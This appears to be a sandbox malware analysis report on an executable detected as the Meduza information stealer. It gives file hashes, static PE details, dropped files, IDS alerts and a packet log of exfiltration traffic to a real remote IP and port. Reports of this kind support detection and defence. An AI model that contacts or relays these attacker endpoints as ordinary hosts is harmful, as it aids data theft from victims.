Preview:	@...e...................................T.......................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Download File

Process:	C:\Users\user\Desktop\HZ1BUCfTne.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2632704
Entropy (8bit):	3.734500250570844
Encrypted:	false
SSDEEP:	24576:MoEKQByjnqh0lhSMXlybSXuRVRoTahOpEfc:jLzjneSan
MD5:	183E24B654414D7BE786CCD8E6A108A5
SHA1:	A18E6D0F9D1E67F404985ADFA2CC6D756E8680AC
SHA-256:	69F8CEA7A5B6E5DE711E9849F4BC0244F1344966364520BC12987F1B90013754
SHA-512:	8CB2D66A7FFE9E84B9BACE8BBD859F050FBF7DC0CB9C4A262BF3467A39D3DB43272D40A071FD2867E84A4CD262BAA6E5347A46556DCAE1A1BFFA0497A147850B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Joe Sandbox View:	Filename: 9RM52QaURq.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T...5...5...5.......5.......5.......5...M..H5...M...5...M...5......5.......5...M...5...5..h5.......5.......5.......5..Rich.5..................PE..d....O4g.........."....).j....$................@..............................(...........`.................................................T.'.d....`(......0(.p,...........p(.P.....'.8.............................'.@............................................text....h.......j.................. ..`.rdata...p$......r$..n..............@..@.data....(....(.......'.............@....pdata..p,...0(.......'.............@..@.rsrc........`(...... (.............@..@.reloc..P....p(......"(.............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0q1oeqrp.lwf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f403vp10.4bw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgbsjuqw.bvu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmvn4y5c.s43.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	0.036534038087357217
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HZ1BUCfTne.exe
File size:	73'555'456 bytes
MD5:	d9ecf06c01f13e20c692308977343e6c
SHA1:	895103bff07402081cf606e943a9b305bab14798
SHA256:	306c35f0a8b13eb8d3ff43f0fe031c9b2d008fddebe501e47e080111ebbb9712
SHA512:	06bb95938904137a1a4a313c2d557eae9fb38eea43918b6f508debb0aa6fc7d0f211d34af019b59d1e538a8d0f7d0ecb1382653f628148b21f3df5c310d9f68b
SSDEEP:	3072:yhuwQp8xdrQrJPn4vxyrQUwsy5TDoDLyTKJvwCHtpxC5Ev3+9af5dWcZ2iYi6Jz:yhdQp8xurN4JlU94SyTKJPpTHf3zZ4
TLSH:	1BF7016D7B480333E6B51B76A9A153476F75ED3F1E15C79A300D00CC37A27188AA3A6B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..Db..........bb.. ....b...@.. ........................b...........`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4a262ae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB3B90B18 [Sun Jul 19 17:04:24 2065 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4626259	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4628000	0x1514	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x462a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x46261ac	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x46242b4	0x4624400	1f2317c50fc8c399032788a2502cdeab	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4628000	0x1514	0x1600	b640befa432d4e33956f0d1adf60d6e6	False	0.3856534090909091	data	5.382386905318459	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x462a000	0xc	0x200	3e6480c94948bec28710dcf9a72ff16f	False	0.044921875	data	0.12227588125913882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x4628090	0x34c	data			0.4087677725118483
RT_MANIFEST	0x46283ec	0x1123	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.4043765671301573

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-15T10:29:30.224291+0100	2049441	ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt	1	192.168.2.10	49927	45.130.145.152	15666	TCP
2024-11-15T10:29:30.224291+0100	2050806	ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2	1	192.168.2.10	49927	45.130.145.152	15666	TCP
2024-11-15T10:29:30.224291+0100	2050807	ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)	1	192.168.2.10	49927	45.130.145.152	15666	TCP
2024-11-15T10:29:30.229420+0100	2050806	ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M2	1	192.168.2.10	49927	45.130.145.152	15666	TCP
2024-11-15T10:29:30.229420+0100	2050807	ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)	1	192.168.2.10	49927	45.130.145.152	15666	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 15, 2024 10:28:57.222461939 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:57.227420092 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:57.227556944 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:57.237636089 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:57.242569923 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.078705072 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.078810930 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.078821898 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.078865051 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.078876972 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.078887939 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.078897953 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.078957081 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.078957081 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.078957081 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.078958988 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.079035997 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.079046965 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.079339981 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.083774090 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.083822966 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.083833933 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.084624052 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.124747992 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.209032059 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.209045887 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.209058046 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.209266901 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.213207006 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.213236094 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.213246107 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.213263988 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.213296890 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.222508907 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.222533941 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.222543955 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.223479033 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.231432915 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.231589079 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.231658936 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.236078978 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.236100912 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.236110926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.236139059 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.236268044 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.245254040 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.245275021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.245285988 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.245342016 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.254692078 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.254734039 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.254744053 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.255341053 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.255908966 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.263413906 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.263426065 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.263437986 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.265283108 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.272650957 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.272665024 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.272675991 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.272748947 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.272748947 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.281303883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.281986952 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.282409906 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.285861015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.285911083 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.285921097 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.286185980 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.338840008 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.338860989 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.338871956 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.339695930 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.342797995 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.342809916 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.342822075 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.342919111 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.342919111 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.351134062 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.351146936 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.351159096 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.351829052 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.359100103 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.359112024 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.359123945 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.359205961 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.359205961 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.367016077 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.367094994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.369724989 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.370949984 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.370960951 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.370973110 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.371153116 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.378293037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.378304958 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.378320932 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.378417969 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.378417969 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.386066914 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.386090994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.386101007 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.386324883 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.393884897 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.393897057 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.393908024 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.393992901 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.393992901 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.401891947 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.401905060 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.401916027 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.402287006 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.410119057 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.410159111 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.410168886 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.410175085 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.410396099 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.417509079 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.417562962 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.417577982 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.417776108 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.425338030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.425359964 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.425370932 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.425415993 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.425575018 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.433001995 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.433027029 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.433036089 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.433408022 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.440323114 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.440393925 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.440412998 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.440424919 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.440642118 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.447757006 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.447767973 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.447913885 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.452172995 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.452186108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.452198982 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.453201056 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.458775997 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.458790064 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.458802938 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.458990097 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.458990097 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.467835903 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.467869043 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.467879057 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.468066931 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.472982883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.472995043 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.473006964 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.473062992 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.473145962 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.480284929 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.480302095 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.480314016 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.480356932 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.487452030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.487468004 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.487581968 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.487773895 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.489351988 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.491734028 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.491777897 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.491789103 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.491847992 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.496047020 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.496061087 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.496073008 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.496185064 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.496185064 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.500283003 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.500296116 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.500308037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.500466108 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.504481077 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.504497051 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.504509926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.504548073 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.504548073 CET	49762	80	192.168.2.10	150.241.95.163
